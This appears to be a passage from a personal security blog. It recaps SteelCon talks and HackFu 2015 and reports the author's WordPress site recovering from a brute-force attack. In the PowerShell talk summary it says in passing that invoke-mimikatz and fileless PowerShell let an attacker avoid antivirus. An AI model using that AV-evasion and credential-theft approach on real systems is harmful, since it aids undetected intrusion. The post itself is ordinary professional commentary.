Saturday came and wow… again a brilliant setup. Breakfast provided for the attendees, a kids track that resulted in some AWESOME lego robotic RUBIK cube solvers, fantastic conference loot (loving the lockpicks from Mad.Bob) and a keynote by the one and only Campbell Murray (@xyz2k). Refreshingly a well balanced technical talk but also not too heavy for the first talk, opened the conference with a good few laughs #blindslided and left me nodding my head excessively at everything he had to say.

The Gist: Penetration Testing was never meant to be a test of compliance. (Checkbox Pentesting) and Red Teaming as we (the industry) call it is NOT Red Teaming…

Analogy: Red Teaming is taking a block of thermite to the hinges of a safe door and smashing it in with a sledgehammer

it’s how penetration testing should and used to be with a wide scope, a definition of the client’s crown jewels and an allowance for the testers to make use of their imagination, not for them to be constrained to arbitrary compliance objectives, low costs and unrealistic timelines.

Following up that talk I watched an exceedingly knowledgable Darren Martyn (@infodox –Β http://insecurety.net/) give a bloody blinder of a talk on hacking embedded devices. Not a talk aimed at those of you with exceptional hardware hacking experience but rather aimed at the low hanging fruit, throughΒ  a series of examples and a detailed case study he illustrated just how easy it is to find these flaws and then to exploit them. If you run a home router, chances are it’s part of someone’s botnet, this stuff was ridiculously easy to do and has made it firmly onto my “to-do” research list.

A few more talks and a lunch that had more than enough food to share amongst the numerous attendees the next talk worthy of particular mention for me was Dave Hardy’s and Ben Turner’s talk on powershell and their work with the metasploit framework. These chaps have taken metasploit’s capabilities with powershell and made it bloody brilliant.

Gone are the days of running a single script and bodging scripts to work. They have created a full blown new “payload” type which returns you a full powershell session with backgrounding, the ability to actually interact with the objects returned as and when you require them and a whole series of utility post modules/scripts that make life even easier.

Evading AV? Powershell is easy mode right now for doing that, these chaps have modified inveigh (read: responder using powershell) in order to work appropriately with the new payload type, you can now invoke-mimikatz within a powershell session and essentially given the armoury of powershell scripts out there, you basically never have a reason to touch disk and therefore never get caught by AV.

Seriously, I can’t do their work justice with a simple write up as part of a post here but check out their websites and get the info.

http://www.hackwhackandsmack.com/
https://pentestn00b.wordpress.com/
https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit

So that brings us to the closer where Harold and Kumar (FreakyClown and Dr Jessica Barker) went to White Castle and taught us to burn the motherf…ker down #pookie. Or rather gave us a disturbing account of how the infosec world could go. The issue we have as an industry is trying to sell what is basically ineffective, we scare-monger users and our sales staff promote new shiny bleeping blinky products until they are blue in the face but people don’t appear to respond as we believe they should and we say that it’s their problem. It isn’t, it’s ours and we as an industry need to drive a new approach.

Roll on to the evening party where netitude placed Β£3k behind the bar, I believe we achieved the goal of drinking the bar dry by about midnight. It was a brilliant evening, starting with a scavenger hunt, Dr Jessica Barker (@drjessicabarker) and FreakyClown (@__freakyclown__) led us all once again only this time into a quiz that proved I do not know my game consoles anywhere near as good as I thought I did but oddly I do know that Coco Chanel was the inventor of the Trouser Suit and “purdy” is a haircut. πŸ™‚

Throw in some copious amounts of drinking with a few chaps from Prospective Risk, Netitude and others while being expertly chaperoned by a member of the SteelCon day staff who’s only name I remember is “Laura” and “Woody”.

"The FlatCappers"

The “Flatcappers” (the conference badge was a traditional flat cap) partied the night away and it all ended for me in the early hours of the sunday morning where I was left wondering “wtf!?” as we emerged to bright sunlight.

05:10am… bedtime, thank goodness for late checkout πŸ˜‰

A truely fantastic conference with the right mix of tracks, talks and one that doesn’t just focus on the 9-6pm conference but one that really put the effort in around the sides to provide a cracking experience that will have me smashing that F5 key once again to grab a ticket next year.

For those of you that want more, on the Sunday they also had laser tag/quasar activities and pizza lunch planned out, I myself opted to sleep and neck paracetamol πŸ˜‰

After a weekend of activity, my sciatica attack never did end and I was left crawling out of my car this evening poking at my medicine cabinet unable to stand up properly, trying to knock the dihydrocodine off the shelf so I may get some relief.

I may be in agony but every minute was worth it. I learned so much in the company of so many excellent people, it was worth every wimper.

Categories
Moved Posts

Quickie #3 – An Update of sorts

Bandwidth Exceeded

So if you’ve recently tried browsing to my site in the last 30 days or so you may have been presented with a not so helpful error message showing that my bandwidth had been exceeded.

Turns out my site was the victim of a dDoS attack/bruteforce at the end of May/Beginning of June and initially while my hosting provider noticed it and informed me of the attack, the “fix” I implemented which was to eliminate xml-rpc.php from my wordpress site initially showed a huge drop in CPU cycles from the hosting PoV, what I didn’t appreciate is that error pages come out of your monthly bandwidth entitlement.

So… 12 hours later a grand total of 5GB of “404 – page not found” texts were downloaded and pow, site was down.

Hosting provider has been a great help throughout the attack and while there were some false starts and confusing conversations going on I finally got through to their support ninja’s had my “fix” confirmed as working and my site is now up and running, at least until someone takes it upon themselves to burn it down or have another go at logging in.

The fix…not using .htaccess to deny (that results in burning your data allowance, but does reduce CPU load) but rather use .htaccess to perform a 302 to http://0.0.0.0 for any matching request.

MWR HackFu 2015

I was invited along to HackFu this year and spent a hugely enjoyable 3 days. MWR Infosecurity definitely know how to run a major cybersecurity event and while a majority of us were penetration testers or security researchers teams were mixed with software developers, mathematicians, etc… even those who did not have a technical skillset could learn new skills such as lockpicking or use their powers of deduction to discover clues and work out who were the moles and the mastermind behind it all.

Incredibly well structured and the challenges I took part in were so well thought out they’ve given me a few good ideas to put together one of my own. From interfacing with game AI to produce “real world” effects from associated hacks to emulating ICS systems having to hack a water pump to retrieve a usb key.

Honestly, if ever you get the opportunity to participate in it, leap for it and go expecting the unexpected πŸ™‚ Genuinely a fantastic time.

Press Article:Β SC-Magazine Write Up